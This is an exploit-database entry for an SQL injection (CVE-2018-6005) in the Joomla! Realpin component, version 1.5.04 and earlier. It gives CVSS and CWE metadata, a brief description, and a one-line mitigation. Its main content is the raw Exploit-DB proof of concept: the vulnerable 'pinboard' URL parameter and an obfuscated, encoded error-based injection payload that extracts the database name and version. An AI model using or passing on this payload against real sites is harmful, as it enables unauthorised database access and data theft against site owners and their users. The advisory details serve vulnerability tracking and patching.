header-logo
Suggest Exploit
vendor:
Realpin
by:
Ihsan Sencan
9.8
CVSS
CRITICAL
SQL Injection
89
CWE
Product Name: Realpin
Affected Version From: 1.5.04
Affected Version To: 1.5.04
Patch Exists: YES
Related CWE: CVE-2018-6005
CPE: a:realpin:realpin:1.5.04
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: WiN7_x64/KaLiLinuX_x64
2018

Joomla! Component Realpin <= 1.5.04 - SQL Injection

Joomla! Component Realpin version 1.5.04 and below is vulnerable to SQL Injection. An attacker can exploit this vulnerability by sending a malicious SQL query to the vulnerable parameter 'pinboard' in the 'index.php' file. This can allow the attacker to gain access to the database and execute malicious code.

Mitigation:

Upgrade to the latest version of Joomla! Component Realpin.
Source

Exploit-DB raw data:

# # # #
# Exploit Title: Joomla! Component Realpin <= 1.5.04 - SQL Injection
# Dork: N/A
# Date: 16.02.2018
# Vendor Homepage: http://realpin.frumania.com/
# Software Link: https://extensions.joomla.org/extensions/extension/multimedia/multimedia-display/realpin/
# Software Download: http://realpin.frumania.com/downloads/com_realpin_j3.1_1.5.04.zip
# Version: <= 1.5.04
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-6005
# # # #
# Exploit Author: Ihsan Sencan 
# # # # 
# 
# POC:
# 
# 1)
# http://localhost/[PATH]/index.php?option=com_realpin&pinboard=[SQL]
#  
# JTM1JTI3JTIwJTQxJTRlJTQ0JTIwJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTM2JTM2JTIwJTQ2JTUyJTRmJTRkJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTQzJTRmJTU1JTRlJTU0JTI4JTJhJTI5JTJjJTQzJTRmJTRlJTQzJTQxJTU0JTI4JTY0JTYxJTc0JTYxJTYyJTYxJTczJTY1JTI4JTI5JTJjJTMwJTc4JTM3JTY1JTM3JTY1JTM3JTY1JTM3JTY1JTJjJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTI4JTQ1JTRjJTU0JTI4JTM2JTM2JTNkJTM2JTM2JTJjJTMxJTI5JTI5JTI5JTJjJTc2JTY1JTcyJTczJTY5JTZmJTZlJTI4JTI5JTJjJTQ2JTRjJTRmJTRmJTUyJTI4JTUyJTQxJTRlJTQ0JTI4JTMwJTI5JTJhJTMyJTI5JTI5JTc4JTIwJTQ2JTUyJTRmJTRkJTIwJTQ5JTRlJTQ2JTRmJTUyJTRkJTQxJTU0JTQ5JTRmJTRlJTVmJTUzJTQzJTQ4JTQ1JTRkJTQxJTJlJTUwJTRjJTU1JTQ3JTQ5JTRlJTUzJTIwJTQ3JTUyJTRmJTU1JTUwJTIwJTQyJTU5JTIwJTc4JTI5JTYxJTI5JTIwJTQxJTRlJTQ0JTIwJTI3JTVhJTQ2JTRiJTRkJTI3JTNkJTI3JTVhJTQ2JTRiJTRk
# 
# # # #